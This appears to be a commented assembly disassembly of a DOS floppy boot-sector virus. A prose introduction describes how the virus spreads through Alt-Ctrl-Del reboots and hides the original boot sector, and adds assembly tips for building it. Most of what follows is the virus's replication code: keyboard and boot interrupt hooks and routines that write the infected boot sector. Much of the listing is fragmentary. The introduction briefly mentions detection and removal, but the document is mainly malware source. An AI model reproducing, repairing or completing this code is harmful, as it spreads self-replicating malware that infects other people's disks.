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[2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virus is of the "FLOPPY ONLY" variety.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t replicates to the boot sector of a floppy disk and when it gains contr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will move itself to upper memory.  It redirects the keyboard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rupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time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will attempt to infect any floppy it finds in drive A:.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keeps the real boot sector at track 39, sector 8, head 0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does not map this sector bad in the fat (unlike the Pakistani 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hould that area be used by a file, the virus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die.  It also contains no anti detection mechanisms as does the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RAIN virus.  It apparently uses head 0, sector 8 and not head 1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tor 9 because this is common to all floppy formats both single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ided and double sided.  It does not contain any malevolent TROJAN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RSE code.  It does appear to contain a count of how many times it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s infected other diskettes although this is harmless and the count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never accessed.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ngs to note about this virus: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can not only live through an ALT-CTRL-DEL reboot command, but thi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its primary (only for that matter) means of reproduction to other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loppy diskettes.  The only way to remove it from an infected system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to turn the machine off and reboot an uninfected copy of DOS.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is even resident when no floppy is booted but BASIC is loaded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tead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,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activates and infectes the floppy from which the user is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tempting to boot.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 note that because of the POP CS command to pass control to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s self in upper memory, this virus does not to work on 80286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chines (because this is not a valid 80286 instruction).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r assembler will not allow the POP CS command to execute, re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OP CS command with an NOP and then assemble it, then debug that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t of the code and place POP CS in place of NOP at that section.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orton Utilities can be used to identify infected diskettes by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oking at the boot sector and the DOS SYS utility can be used to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ve it (unlike the Pakistani Brain).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  7C00H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LABEL     WORD           ;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. Find top of memory and copy ourself up there. (keeping same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. Save a copy of the first 32 interrupt vectors to top of memory too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. Redirect int 9 (keyboard) to ourself in top of memory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4. Jump to ourself at top of memory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5. Load and execute REAL boot sector from track 40, head 0, sector 8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   CLI                 ;INITIALIZ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AX,AX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SS,AX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SP,offset TOS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BX,0040H       ;ES = TOP OF MEMORY - (7C00H+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DS,BX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X,[0013H]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  BX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AX,07E0H       ;   (7C00H+512)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ES,AX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S             ;DS =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DS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 DI,3456H       ;IF THE VIRUS IS REBOO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E  B_10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Word Ptr [COUNTER_1]     ;...LOW&amp;HI:COUNTER_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_10:    MOV  SI,SP     ;SP=7C00  ;COPY SELF TO TOP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DI,SI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CX,512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D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 MOVSB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SI,CX     ;CX=0          ;SAVE FIRST 32 INT VETOR ADDR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DI,offset BEGIN - 128    ;   128 BYTES BELOW OUR H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CX,128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 MOVSB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_NEW_09          ;SAVE/REDIRECT INT 9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ES   ;ES=HI    ;   JUMP TO OUR HI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S   ;DS=0     ;   ES =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ES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BX,SP          ;   SP=7C00  ;LOAD REAL BOOT SECTOR TO 0000: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DX,CX          ;CX=0        ;DRIVE A: HE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CX,2708H       ;   TRACK 40, SECT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X,0201H       ;  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13H            ;   (common to 8/9 sect. 1/2 si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   $              ;   HANG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JMP_BOOT       ;JMP 0000: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VE THEN REDIRECT INT 9 VECTOR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ENTRY:   DS = 0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ES = WHERE TO SAVE OLD_09 &amp; (HI)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WHERE NEW_09 IS         (HI)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EW_09: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Word Ptr [0413H]    ;TOP OF MEMORY (0040:0013) -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SI,9*4              ;COPY INT 9 V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DI,offset OLD_09    ;   OLD_09 (IN OUR HI C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CX,0004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 MOVSB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Word Ptr [9*4],offset NEW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[(9*4)+2],ES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ET KEYBOARD, TO ACKNOWLEDGE LAST CHAR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_KEYBD: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AL,61H              ;RESET KEYBOAR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H,AL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AL,80H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61H,AL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HG AL,AH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61H,AL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RBOOT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A AREA WHICH IS NOT USED IN THIS VERSION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SON UNKNOWN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DB   27H,0,1,2      ;FORMAT INFORMATION FOR TRACK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 27H,0,2,2      ;  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 27H,0,3,2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 27H,0,4,2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 27H,0,5,2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 27H,0,6,2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 27H,0,7,2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 27H,0,8,2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7C9A   LABEL     BYTE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  00024H              ;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 0ADH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 07CH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 0A3H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  00026H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7CA1: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CX             ;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DI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SI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ES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DS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AX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F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1111:1111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ALT &amp; CTRL &amp; DEL THEN ...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ALT &amp; CTRL &amp; ? THEN ...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09:  PUSHF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X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X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S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S             ;DS=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DS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BX,[ALT_CTRL W]     ;BX=SCAN COD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AL,60H              ;GET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H,AL               ;SAVE IN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X,887FH       ;STRIP 8th BIT IN AL, KEEP 8th BIT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 AL,1DH              ;IS IT A [CTRL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E  N09_10              ;...JUMP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BL,AH               ;(BL=08 ON KEY DOWN, BL=88 ON KEY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N09_30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09_10:  CMP  AL,38H              ;IS IT AN [ALT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E  N09_20              ;...JUMP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BH,AH               ;(BH=08 ON KEY DOWN, BH=88 ON KEY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N09_30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09_20:  CMP  BX,0808H       ;IF (CTRL DOWN &amp; ALT DOWN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E  N09_30              ;...JUMP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 AL,17H              ;IF [I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  N09_X0              ;...JUMP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 AL,53H              ;IF [DEL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  ACK_KEYBD      ;...JUMP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09_30:  MOV  [ALT_CTRL],BX       ;SAVE SCAN CODE FOR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09_90:  POP  DS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BX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AX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F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 0EAH           ;JMP F000:E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_09   DW   ?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  0F000H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09_X0:  JMP  N09_X1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RBOOT:   MOV  DX,03D8H       ;DISABLE COLOR VIDEO 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X,0800H       ;AL=0, AH=DELAY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DX,AL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ELAY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[ALT_CTRL],AX  ;AX=0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L,3 ;AH=0          ;SELEC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10H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H,2           ;SET CURSOR POS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DX,DX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BH,DH               ;  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10H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H,1           ;SET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CX,0607H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10H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X,0420H       ;DELAY (AL=20H FOR EOI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ELAY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20H,AL              ;SEND EOI TO IN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ES,CX     ;CX=0 (DELAY)  ;RESTORE FIRST 32 IN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DI,CX               ;   (REMOVING OUR INT 09 HANDL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SI,offset BEGIN - 128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CX,128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D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 MOVSB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DS,CX     ;CX=0          ;D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Word Ptr [19H*4],offset NEW_19 ;SET INT 19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[(19H*4)+2],CS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X,0040H       ;DS = ROM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DS,AX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[0017H],AH     ;AH=0     ;KBFLAG (SHIFT STATES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Word Ptr [0013H]    ;MEMORY SIZE += 1024 (WERE NOT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S             ;IF BIOS F000:E502 == 21E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X,0F000H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DS,AX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 Word Ptr [0E502H],21E4H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DS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  R_90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19H            ;   IF NOT...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_90:    JMP  0F000:0E502H        ;...DO IT ?!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BOOT INT VECTOR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19:  XOR  AX,AX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DS,AX               ;D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X,[0410]      ;AX=EQUI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L,1           ;IF FLOPPY DRIV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N19_20              ;...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19_10:  PUSH CS             ;ELSE ES=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ES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_NEW_09          ;SAVE/REDIRECT INT 9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18H            ;LOA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19_20:  MOV  CX,0004             ;RETRY COUN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19_22:  PUSH CX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H,00               ;RES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13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   N19_81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X,0201             ;READ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S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ES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BX,offset BEGIN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CX,1           ;TRACK 0,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13H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19_81:  POP  CX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B  N19_90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N19_22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N19_10              ;IF RETRY EXPIRED...LOA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infection segment.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N19_90:  CMP  DI,3456             ;IF NOT FLAG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RE_INFECT      ;...RE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OOT:                    ;PASS CONTROL TO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0000:7C00H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infection Segment.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_INFECT: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SI,offset BEGIN          ;COMPARE BOOT SECTOR JUST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CX,00E6H       ;   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DI,SI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S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ES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D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 CMPSB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  RI_12               ;IF NOT EQU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Word Ptr ES:[COUNTER_1]  ;INC. COUNTER IN OUR CODE (NOT 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KE SURE TRACK 39, HEAD 0 FORMATTED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BX,offset TABLE          ;FORM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DX,0000             ;DRIVE A: HE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CH,40-1             ;TRACK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H,5           ;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RI_10               ;REMOVE THE FORMAT OPTION FOR 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&lt;&lt; NO EXECUTION PATH TO HERE &gt;&gt;&gt;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   RI_80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WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HE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_10:   MOV  ES,DX               ;ES:BX = 0000:7C00, HEA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BX,offset BEGIN          ;TRACK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CL,8           ;SECT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X,0301H       ;WRITE 1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13H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S             ;   (ES=CS FOR PUT_NEW_09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ES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   RI_80               ;IF WRITE ERROR...JUMP TO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CX,0001             ;WRITE INFECTED BOOT SECT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X,0301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13H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   RI_80               ;   IF ERROR...JUMP TO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_12:   MOV  DI,3456H       ;SET "JUST INFECTED ANOTHER ON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19H            ;...FLAG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_80:   CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9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Word Ptr ES:[COUNTER_1]  ;   (DEC. CAUSE DIDNT IN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JMP_BOOT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N09_X1:  MOV  [ALT_CTRL],BX       ;SAVE ALT &amp; CTR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X,[COUNTER_1]      ;PUT COUNTER_1 INTO RE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BX,0040H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DS,BX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[0072H],AX          ;   0040:0072 = RE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N09_90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LAY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ENTRY    AH:CX = LOOP COUNT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:   SUB  CX,CX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_01:    LOOP $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AH,1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D_01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A7DF4         DB   27H,00H,8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_1     DW   001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CTRL      DW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7DFC         DB   27H,0,8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